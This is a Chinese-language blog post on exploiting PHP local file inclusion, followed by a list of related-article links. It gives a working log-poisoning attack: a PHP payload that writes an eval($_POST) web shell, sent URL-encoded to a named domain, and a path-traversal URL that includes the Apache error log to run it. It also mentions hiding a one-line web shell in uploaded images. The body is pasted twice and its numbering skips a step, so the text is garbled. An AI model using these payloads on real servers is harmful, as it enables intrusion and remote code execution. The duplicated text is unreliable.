PHP中 LFI Local File Include,本地文件包 漏洞
2014-09-08 17:06
323 查看
在allow_url_include=On就是远程文件包含了,假设这里为off,那就只能本地包含了。
1. 包含上传文件
只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。
3. 日志包含log日志文件
日志包含,这个还是比较实用的,一般apache或者其他的日志都会比较大,而我们为什么能通过日志getwebshell?比如apache,当我们访问一个网站的网页时,页面出错,服务器会记录访问的连接地址,如果我们带入恶意的代码那么这个就会被包含在日志文件中。所以我们一般的利用步骤是:
首先访问一个不可能存在页面并且携带恶意代码,比如邪恶代码为:
<?php fputs(fopen("/www/shell.php","W+"),"<?php eval($_POST[a]?>";?>
将它转换为url编码,然后访问
http://www.81sec.com/+urlencode(邪恶代码)
这个页面肯定不存在,那么在错误日志中就会形成一条这样日志,接下来,我们就包含这条日志:
http://www.81sec.com/test.php?p=../../../../var/logs/apache/www_error.log
apache路径需要自己去猜解,我这里只是给个实例,访问后就会生成一个shell了。
此位,觉得可行的方法。
1. 包含上传文件
只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。
3. 日志包含log日志文件
日志包含,这个还是比较实用的,一般apache或者其他的日志都会比较大,而我们为什么能通过日志getwebshell?比如apache,当我们访问一个网站的网页时,页面出错,服务器会记录访问的连接地址,如果我们带入恶意的代码那么这个就会被包含在日志文件中。所以我们一般的利用步骤是:
首先访问一个不可能存在页面并且携带恶意代码,比如邪恶代码为:
<?php fputs(fopen("/www/shell.php","W+"),"<?php eval($_POST[a]?>";?>
将它转换为url编码,然后访问
http://www.81sec.com/+urlencode(邪恶代码)
这个页面肯定不存在,那么在错误日志中就会形成一条这样日志,接下来,我们就包含这条日志:
http://www.81sec.com/test.php?p=../../../../var/logs/apache/www_error.log
apache路径需要自己去猜解,我这里只是给个实例,访问后就会生成一个shell了。
此位,觉得可行的方法。
相关文章推荐
- PHP本地文件包含(LFI)漏洞利用
- PHP本地文件包含(LFI)漏洞利用
- PHP本地文件包含(LFI)漏洞利用
- php 伪造本地文件包含漏洞的代码
- php读取本地文件常用函数(fopen与file_get_contents)
- php中include,require的文件包含问题,以及$_SERVER['PHP_SELF']和__FILE__的区别
- php本地及远程文件包含漏洞
- php 伪造本地文件包含漏洞的代码
- PHP各种引入(读取)文件函数的执行效率include require fpassthru readfile等的性能比较
- PHP各种引入文件函数的执行效率include require fpassthru readfile
- PHP各种引入文件函数的执行效率include require fpassthru readfile
- PHP文件包含命令(include,require)及漏洞利用
- 本地文件包含漏洞详解---LFI
- DVWA之PHP文件包含漏洞(File Inclusion)
- PHP本地文件包含漏洞的新突破
- PHP学习笔记,curl,file_get_content,include和fopen四种方法获取远程文件速度测试.
- 邪恶的空格-PHP本地文件包含漏洞的新突破口!
- 织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
- Qt打开外部程序和文件夹需要注意的细节(注意QProcess的空格问题,以及打开本地文件时,需要QUrl::fromLocalFile才可以)
- PHP本地文件包含漏洞环境搭建与利用